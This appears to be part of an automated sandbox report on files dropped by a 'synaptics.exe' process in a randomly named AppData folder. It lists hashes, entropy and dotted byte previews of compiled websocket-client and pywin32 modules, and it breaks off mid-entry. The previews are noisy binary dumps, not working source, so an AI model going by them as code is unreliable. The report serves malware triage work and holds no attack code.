                                                                                                                                                                                                            Size (bytes):11162
                                                                                                                                                                                                            Entropy (8bit):5.413978092249609
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pfJmK7mmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                                            MD5:F7E05848C5FF628954C64974018E0DED
                                                                                                                                                                                                            SHA1:3A1098164B573AA8E476AE58411EC48F7B759A1C
                                                                                                                                                                                                            SHA-256:9FC11EAA79106A433AF0301D20581A1D81F0488100BA2DA4D2748497E0E31A19
                                                                                                                                                                                                            SHA-512:E054478F992052123B5BA66B604897A665ED1EBB79BEC17C5815333A2AFA5343FD297C679E1EBFFA343658088E4F1A387BD28625DF302BEE391D202FED55D798
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19450
                                                                                                                                                                                                            Entropy (8bit):5.4034824191786575
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:nHJMnoF3eIfFDxNUbVr5mEtr0zSo0/3888tiYn:nHJMnoF3eIddNcrggqSo0/98ln
                                                                                                                                                                                                            MD5:864EA769D330A837A0D3C6B5CBD19FC7
                                                                                                                                                                                                            SHA1:A8E945FE7C21AB07C45A5B59C553E26D20F3CF48
                                                                                                                                                                                                            SHA-256:BC4871486B9BD856F3135DA6BBE842E366A2E516EAA1FB10BE46A99E28D4BDD8
                                                                                                                                                                                                            SHA-512:B6DA048B51679DE937098FDAAED595BCF1A2884EBE9954EF63A1BF8BDD48DFBA65F3EFFB2DF936A948D0A3B5FFF6FB38060425DA4672D914879422F4C8B0A434
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gp^.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.g.Z.d.a.d.e.d.d.f.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z G.d.d...d...Z!d.S.)......N)...Any..Callable..Optional..Union.....)..._logging)...ABNF)...WebSocket..getdefaulttimeout).."WebSocketConnectionClosedException..WebSocketException..WebSocketTimeoutException)...SSLEOFError)...parse_url..WebSocketApp..reconnectInterval..returnc....................C...s....|.a.d.S...N)...RECONNECT).r......r.....KC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_app.py..setReconnect+...s......r....c....................@...sf...e.Z.d.Z.d.Z.d.e.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.S.)...DispatcherBasez.. DispatcherBase. ..app..ping_timeoutNr....c....................C...s....|.|._.|.|._.d.S.r....).r....r....)...se
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1845
                                                                                                                                                                                                            Entropy (8bit):5.116059019173107
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IYq+PEfF2cYReITZg0ZVzD0oOBzttwutP5iIv0UdzcbVHckuxj7kV5ZFgrI:5lPAMcBI7gPBzreIv0UdzMcLgV5KI
                                                                                                                                                                                                            MD5:61E6EF1E318603AE7E54F6D120FFF09C
                                                                                                                                                                                                            SHA1:3F5A0522C928357AC28D1A8A75E74BEE367CEFE5
                                                                                                                                                                                                            SHA-256:32598ACAF62FF25B52DDE149EC08976AB58A63CEB4F56EFAB47CA3DDFE776888
                                                                                                                                                                                                            SHA-512:F44C9C826BA2EF9FF119F090DE6B9CE0248918DC4A753C4756C9D5AA7D1ABF7E4650938E8626512A228FEE5468022171AF6E34C06AB62AB3A3876433DDD374CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g_........................@...s(...d.d.l.Z.d.d.l.m.Z.....G.d.d...d...Z.d.S.)......N)...Optionalc....................@...sP...e.Z.d.Z.d.d.d...Z.d.e.e...d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.e.f.d.d...Z.d.S.)...SimpleCookieJar..returnNc....................C...s....i.|._.d.S.).N)...jar)...self..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_cookiejar.py..__init__....s......z.SimpleCookieJar.__init__..set_cookiec....................C...s....|.r=t.j...|...}.|.....D.]2}.|...d.....}.r<|...d...s.d.|.....}.|.j...|...r+|.j...|...n.t.j.....}.|...|.....|.|.j.|.....<.q.d.S.d.S...N..domain...)...http..cookies..SimpleCookie..values..get..startswithr......update..lower).r....r......simple_cookie..vr......cookier....r....r......add....s..................................z.SimpleCookieJar.addc....................C...sV...|.r't.j...|...}.|.....D.].}.|...d.....}.r&|...d...s.d.|.....}.|.|.j.|.....<.q.d.S.d.S.r....).r....r....r....r....r....r....r....r....).r....r....r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18762
                                                                                                                                                                                                            Entropy (8bit):5.260785345365784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:/5oj/9NgJBx938wlJYz2citggg7zXEjsVdTPe:/a9Nq3rlO2ciU7DEYnTPe
                                                                                                                                                                                                            MD5:87D3C1610FA82CE8CDFC09F916A4AE63
                                                                                                                                                                                                            SHA1:85D239F87F35B93B11357EDE6850902DE37523DA
                                                                                                                                                                                                            SHA-256:6EBDB0C6672BAF06F30CD5B1E4B0AB7D61E2229369CB134E1AAD6D933BC0514D
                                                                                                                                                                                                            SHA-512:87059A1CC3FD8072209918A4B836266080B5DC96656DF9EF6CA748684489E4FD3A1FC46AEDFC55A3BB2AC9E6996EBE64580AD69E92688F975B8019D934823FF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gXR.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....d.d.g.Z$G.d.d...d...Z%d.e%f.d.e&f.d.d...Z'd.S.)......N)...Optional..Union.....)...ABNF..STATUS_NORMAL..continuous_frame..frame_buffer)...WebSocketProtocolException."WebSocketConnectionClosedException)...SUPPORTED_REDIRECT_STATUSES..handshake)...connect..proxy_info)...debug..error..trace..isEnabledForError..isEnabledForTrace)...getdefaulttimeout..recv..send..sock_opt)...ssl)...NoLock..WebSocket..create_connectionc....................@...s ...e.Z.d.Z.d.Z.............dPd.e.d.e.d.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.e.e.e...Z.d.d...Z.e.e...Z.d.d...Z.e.e...Z.d.d...Z.d d!..Z.e.e...Z.d"d#..Z.e.j.f.d$e.e.e.f...d%e.d.e.f.d&d'..Z.d(e.d.e.f.d)d*..Z.d+e.e.e f...d.e.f.d,d-..Z!d.e.f.d.d/..Z"d$e.d.e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2951
                                                                                                                                                                                                            Entropy (8bit):5.12950269116811
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:VC9Vw3WRenl4+h0CH31KO8ZUUKJjznx8uDCDcDHMjk9LQVR3qh89CK:c9Vw3Cenl4s3HFKDZXsztDAcDsMQH79B
                                                                                                                                                                                                            MD5:C9193F906181782F3F648017AACE91E6
                                                                                                                                                                                                            SHA1:1180A7D60EF22180D401FDDEA8C7EA1F7F3743CF
                                                                                                                                                                                                            SHA-256:157DFDCED155A9CD33AD290B57A3681E2B5A4284175A5F1A938DCCBC4F7EC721
                                                                                                                                                                                                            SHA-512:71C8DDF3ECEF75289B0B6DD99FE50D1CA89E76D09BD5B67A8F7598E1453898C1AFC5B2926124CC908ACCC4231B033B923E50C34796B7D7BD6439F2E0EA8544F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).ae...._exceptions.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..c....................@........e.Z.d.Z.d.Z.d.S.)...WebSocketExceptionz$. WebSocket exception class.. N....__name__..__module__..__qualname__..__doc__..r....r.....RC:\Users\user\AppData\Local\x
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5704
                                                                                                                                                                                                            Entropy (8bit):5.691904149089032
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1r4s3HFKqfGnCzflfe8mtj6my9mZH5yEG/Zd2ROHvNI2Mr6uURW8R6:1r33HxOCzfc8IHChd+qhRPR6
                                                                                                                                                                                                            MD5:E5248A40304B4008733DA3AC01138ABE
                                                                                                                                                                                                            SHA1:D082A4E19ABE3077E2DABBF5507F65A0CAED0BD8
                                                                                                                                                                                                            SHA-256:BADD45719BE36020D43CDD24C668510DA00E5AD71885DDB20B7EE2494D189927
                                                                                                                                                                                                            SHA-512:BEA72FB5ECA7B1CDF3CE17A563C4B1B81BF222B555FFCB6FF3B2CB90C9346A6D9D9FB346BD0CFF61F713C50797BA5A45CDB39F0EF431F675E97823567D8E5F7C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...sR...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.e.j.e.j.e.j.e.j.e.j.f.Z.e.e.j.f...Z.e...Z.G.d.d...d...Z d.e!d.e!d.e"d.e!d.e f.d.d...Z#d.e!d.e!f.d.d...Z$d.e!d.e!d.e!d.e"d.e%d.e&f.d.d...Z'e.f.d.e&d.e&f.d.d...Z(d.d d!..Z)d"e!d.e&f.d#d$..Z*d.e!f.d%d&..Z+d.S.)'ad...._handshake.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the Licens
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8111
                                                                                                                                                                                                            Entropy (8bit):5.6592606460196535
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G33HwL4DWl5HfG443QYGo3R0wTk9SJXg2QhkmYeG:G3S4DWl5/23QYGoh0icdkveG
                                                                                                                                                                                                            MD5:9A33750C2C42A3A24D9186E8FF78C400
                                                                                                                                                                                                            SHA1:1121391DEE13B89D732BA36DB8F25C866975FFE5
                                                                                                                                                                                                            SHA-256:3AB920F7F7741234293E88AEAB91C99734F211ABE17828E8C7CEA49255A5E076
                                                                                                                                                                                                            SHA-512:C9F87D74155BC773A6749D26B60E695C3779F2C13DC487BB380DBB1FA8CE8B844D2E843030CDE03B8B737A0972F0555DB11B8340677E1FA072C3EC0AD4082F30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.2.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.Z.W.n.......d.Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"G.d.d...d.e ..Z#Y.G.d.d...d...Z$d.e%d.e&f.d.d...Z'd.e%f.d.d...Z(d.e)d.e*d.e&f.d d!..Z+d"d#..Z,d$e.j.d%e-f.d&d'..Z.d$e.j.d(e-f.d)d*..Z/d$e.j.d.e)d.e.j.f.d+d,..Z0d$e.j.d.e&f.d-d...Z1d.S.)/a_...._http.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specifi
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2440
                                                                                                                                                                                                            Entropy (8bit):4.753102652621869
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Zspkf04aURvDMDzDf+h3X0V3fFxksmtOX5uPJPZXrnquoGgBED:Ii0r803W3X0VvqtOX5uPJBloGgB4
                                                                                                                                                                                                            MD5:943DFF54F9B38130F759556A8288DDCF
                                                                                                                                                                                                            SHA1:3DDDBDB66681FC9A4F870B34229010B0CB523827
                                                                                                                                                                                                            SHA-256:9021C8BC4164AE7EAEBB3ABCD0A00366CFEA540ECF4C6C97D93B283D3F87BD40
                                                                                                                                                                                                            SHA-512:12264E99CB2F735A49A0ACFBDA322424FAFAD62A87C47C6F37D50499CAB1530ED423AB5A088CA06A7C827A405EBA71B6090CB2718F48C45BAF8B098B658E5611
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s&...d.d.l.Z...e...d...Z.z.d.d.l.m.Z...W.n...e.y$......G.d.d...d.e.j...Z.Y.n.w.e...e.......d.a.g.d...Z.e.....d.f.d.e.d.e.j.d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d d!..Z.d.e.f.d"d#..Z.d.S.)$.....N..websocket)...NullHandlerc....................@...s....e.Z.d.Z.d.d.d...Z.d.S.).r......returnNc....................C...s....d.S...N..)...self..recordr....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_logging.py..emit...........z.NullHandler.emit).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....F)...enableTrace..dump..error..warning..debug..trace..isEnabledForError..isEnabledForDebug..isEnabledForTrace..DEBUG..traceable..handler..levelr....c....................C...s*...|.a.|.r.t...|.....t...t.t.|.......d.S.d.S.).z.. Turn on/off the traceability... Parameters. ----
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4062
                                                                                                                                                                                                            Entropy (8bit):5.420061415893845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JJkFTTnpUXHQ9VTyHLDPEoFgTHX+S6VAqcm1MlMfs:Jy3nmXoTUsoUuSE11IMfs
                                                                                                                                                                                                            MD5:C04B95566DC77381CFCA21D53DD8B277
                                                                                                                                                                                                            SHA1:8ACF7288E498B10B3D9791A24E6479C4FDFCB9E9
                                                                                                                                                                                                            SHA-256:1270AAA5DC12C844D450FB4E790A50A91A9DCF89548B71D2D2C45234E643101A
                                                                                                                                                                                                            SHA-512:6FB4B9AEDCBDC9956F77F59B12D9243E22C8D61C8C1C7DFC3DDFC7F99502E9DFC92EA6CCB010228CD5E2B0F5595DD4C5316BCDCEC9DC5B9FACF4B601B96C72F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gN........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j.e.j.d.f.g.Z.e.e.d...rDe...e.j.e.j.d.f.....e.e.d...rSe...e.j.e.j.d.f.....e.e.d...rbe...e.j.e.j.d.f.....e.e.d...rqe...e.j.e.j.d.f.....d.a.g.d...Z.G.d.d...d...Z.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.j.d.e.d.e f.d.d...Z!d.e.j.d.e f.d.d...Z"d.e.j.d.e.e e#f...d.e.f.d.d...Z$d.S.) .....N)...Union.....).."WebSocketConnectionClosedException..WebSocketTimeoutException)...SSLError..SSLWantReadError..SSLWantWriteError)...extract_error_code..extract_err_message..SO_KEEPALIVE..TCP_KEEPIDLE.......TCP_KEEPINTVL.......TCP_KEEPCNT.....)...DEFAULT_SOCKET_OPTION..sock_opt..setdefaulttimeout..getdefaulttimeout..recv..recv_line..sendc....................@...s"...e.Z.d.Z.d.e.d.e.d.d.f.d.d...Z.d.S.).r......sockopt..sslopt..returnNc....................C...s....|.d.u.r.g.}.|.d.u.r.i.}.|.|._.|.|._.d.|._.d.S...N).r....r......timeout)...selfr....r......r.....N
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1515
                                                                                                                                                                                                            Entropy (8bit):5.238245888587336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:WgiToV7RkwGW7mTzhZl4IpheU0E+4HQk1Gps2B5OBD8TOofF5HJu2OeuxHb:Wr07aLUI4+h0CH31KN0BQTvvVfyb
                                                                                                                                                                                                            MD5:4D225D074F4AF6C57275E1921A886249
                                                                                                                                                                                                            SHA1:ACA799FC65C01EF9FEA3F80CC2082157EA2A2854
                                                                                                                                                                                                            SHA-256:E7F6710D8C61AC41E0A6A63A9509189E4B37E700B29421EA97AF25AA8B74B1C2
                                                                                                                                                                                                            SHA-512:9FFEBB52FB4B1DA0486CBEC46F9A36506058FFD029D479DC99B7C8E72AA2268DD933F7354CF603FE4AEFA5DC6600DAA79DE4406C0FA8CEA9605327FD8FFE5DF6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.Z.g.d...Z.z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.Z.W.d.S...e.yI......G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.Y.d.S.w.).ae...._ssl_compat.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..)...HAVE_SSL..ssl..SSLError..SSLEOFError..SSLWantReadError..SSLWantWriteError.....N).r....r....r....r....Tc....................@........e.Z.d.Z.d.S.).r....N....__name__..__module__..__qu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4378
                                                                                                                                                                                                            Entropy (8bit):5.50318295542504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:LlQBQRosjTaIzsNAuT/ceAxr6UYtSwGJBBK9WFSuGZDgQ:WBQRRXTIkB2UYPQkqGZ
                                                                                                                                                                                                            MD5:7CB80A8F78078EFEA1B29F575E5716FA
                                                                                                                                                                                                            SHA1:5017ADE544DD4514E78088C8A89AE3F9F0280114
                                                                                                                                                                                                            SHA-256:5EBF0EF8F34B8F7FAC47EAC7E4863B7420D28994EE5F6576718D8C6A115C0EC3
                                                                                                                                                                                                            SHA-512:A24C3D0E95A9991F942D44C403CF325043C596E70A939E7DC40EA91953AFC7F5B93DB115CF0C205001E693C2BF5DFE02FB3DF3AB75E4C9A8F61ECA3BC425C381
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.g.Z.d.e.d.e.f.d.d...Z.d.d.g.Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e...d.e.f.d.d...Z...........d!d.e.d.e.d.e.e...d.e.d.e.e...d.e.e...d.e.d.e.f.d d...Z.d.S.)".....N)...Optional)...unquote..urlparse.....)...WebSocketProxyException..parse_url..get_proxy_info..url..returnc....................C...s....d.|.v.r.t.d.....|...d.d...\.}.}.t.|.d.d...}.|.j.r.|.j.}.n.t.d.....d.}.|.j.r)|.j.}.d.}.|.d.k.r4|.s3d.}.n.|.d.k.r?d.}.|.s>d.}.n.t.d.|.......|.j.rL|.j.}.n.d.}.|.j.rY|.d.|.j.....7.}.|.|.|.|.f.S.).z.. parse url and the result is tuple of. (hostname, port, resource path and the flag of secure mode).. Parameters. ----------. url: str. url string.. ..:z.url is invalidr......http)...schemez.hostname is invalidr....F..ws.P.....wssTi....z.scheme %s is invalid../..?)...ValueError..splitr......hostname..port..path..query).r....r......parse
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                            Entropy (8bit):4.086461551356513
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:qxFBpqD0qxy3vxQkJxriXOTwJSPe1IHcO6GA9PYR:qxFBpo0Wy+k/rUOTOSP+IP6GnR
                                                                                                                                                                                                            MD5:3F12152E1CC2563ED6D53E170D60D408
                                                                                                                                                                                                            SHA1:3D97EAC3B1454FA39C771578FC7BEFFACD3704BE
                                                                                                                                                                                                            SHA-256:34EE83C2D4071AB26D2DCA2856E105BEE63B4910DFC74F71EF936AEFFC8DB2F9
                                                                                                                                                                                                            SHA-512:0D8E2F33C0EC5E6820CFC3FCBF7AB4529ACFA73D5A7C61D162EFF0A820467A613C87CB991EC77C59F28FD923DC394E01772BA5DEEB3897CC6D92BE6054F40A2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g1........................@...s....d.d.l.m.Z.....g.d...Z.G.d.d...d...Z.z.d.d.l.m.Z...d.e.e.e.f...d.e.f.d.d...Z.W.n+..e.yR......d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.Y.n.w.d.e.e.e.f...d.e.f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.S.)......)...Union)...NoLock..validate_utf8..extract_err_message..extract_error_codec....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.).r......returnNc....................C........d.S...N..)...selfr....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_utils.py..__enter__...........z.NoLock.__enter__c....................C...r....r....r....).r......exc_type..exc_value..tracebackr....r....r......__exit__....r....z.NoLock.__exit__).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....)...Utf8Validator..utfbytesr....c....................C...s....t.....|...d...}.|.S...Nr....).r......validate).r......resultr....r....r......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):523
                                                                                                                                                                                                            Entropy (8bit):5.493554056319541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CPH8RtWsrPJeMS4OjyJasv6OlBYfsTztmm:UetWsheD4kyJTSOzYfcr
                                                                                                                                                                                                            MD5:1CDB4B5EA79B004606E0D8BEB911CA4D
                                                                                                                                                                                                            SHA1:878703ADFCEAACAC889E16604C4197E598517A87
                                                                                                                                                                                                            SHA-256:D1560D9EA0FA00AC7B4717C9D321BEF5C99C01489E7836A4092E142DE9114DED
                                                                                                                                                                                                            SHA-512:290A64102F0CBF6858E9F6CBA6C7F59FCC65467F7013C27538B29270C2A28BA5123EA0526289A1CCCCB475DE6FDE0261EC863B56019C1CDB520BC9E2E9A90169
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g ........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....XC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                            Entropy (8bit):5.25854723010019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l0H2TWmbT1esm0TcObLNuETO6jG+Qv6mdqm0:G2TWmle8QNETO5zhq1
                                                                                                                                                                                                            MD5:06AF1CAB23D8E639194FA276D5B0B47C
